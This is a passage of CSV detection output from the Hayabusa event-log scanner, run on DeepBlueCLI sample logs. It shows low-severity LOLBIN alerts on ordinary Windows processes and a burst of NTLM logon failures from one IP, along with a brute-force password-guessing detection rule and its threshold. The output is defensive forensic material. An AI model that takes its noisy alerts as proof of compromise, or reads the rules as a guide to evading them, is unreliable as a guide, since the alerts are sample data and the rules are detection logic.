IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:13:05.430 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:05.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:06.461 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: 
IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:14.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:14.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:18.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:18.465 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:20.357 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | 
PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:40.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:40.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:08.521 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:09.193 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:15:06.588 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:15:06.635 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:21:37.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:21:40.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:26:11.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:26:16.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:26:42.937 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:45:37.636 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:36:17.350 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 
6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon 
Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: 